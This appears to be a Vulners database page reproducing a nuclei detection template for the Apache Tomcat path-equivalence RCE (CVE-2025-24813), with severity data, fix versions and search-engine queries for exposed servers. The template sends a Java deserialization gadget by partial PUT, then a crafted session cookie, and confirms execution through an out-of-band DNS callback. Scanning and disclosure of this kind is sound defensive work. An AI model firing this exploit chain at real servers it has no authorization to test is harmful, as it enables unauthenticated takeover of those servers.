Lucene search
K

Apache Tomcat Path Equivalence - Remote Code Execution

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 107 Views

Apache Tomcat vulnerability allows remote code execution via path equivalence. Upgrade recommended.

Related
Refs
Code
id: CVE-2025-24813

info:
  name: Apache Tomcat Path Equivalence - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch,theMiddle
  severity: critical
  description: |
    Path Equivalence- 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.
  impact: |
    Unauthenticated attackers can exploit path equivalence issues to upload malicious files and execute arbitrary code, leading to complete server compromise and potential data exfiltration.
  remediation: |
    Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.98, which fixes the issue.
  reference:
    - https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
    - https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq
    - http://www.openwall.com/lists/oss-security/2025/03/10/5
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24813
    - https://security.netapp.com/advisory/ntap-20250321-0001/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-24813
    cwe-id: CWE-44,CWE-502
    epss-score: 0.99945
    epss-percentile: 0.99971
    cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: apache
    product: tomcat
    shodan-query:
      - http.component:"apache tomcat"
      - cpe:"cpe:2.3:a:apache:tomcat"
      - http.html:"apache tomcat"
      - http.html:"jk status manager"
      - http.title:"apache tomcat"
      - product:"tomcat"
    fofa-query:
      - server=="apache tomcat"
      - body="apache tomcat"
      - body="jk status manager"
      - title="apache tomcat"
    google-query:
      - intitle:"apache tomcat"
      - site:*/examples/jsp/snp/snoop.jsp
  tags: cve,cve2025,apache,tomcat,rce,intrusive,kev,vkev,vuln

flow: http(1) && http(2)

variables:
  filename: "{{randbase(6)}}"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: header
        words:
          - "Apache"
        internal: true

  - raw:
      - |
        PUT /{{filename}}.session HTTP/1.1
        Host: {{Hostname}}
        Content-range: bytes 0-452/457

        {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}

      - |
        GET /{{filename}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: JSESSIONID=.{{filename}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: status
        status:
          - 201
# digest: 4a0a0047304502210096e00f825d32c598c50fca22f7c7203486d5d8fa1d3a7e6da2e569599d19fb38022033a449fa7358a6f276cca500ba3fcf8ce5a4579efb4cdb0023780fd759495f1f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.7High risk
Vulners AI Score8.7
CVSS 3.19.8 - 10
EPSS0.99945
SSVC
107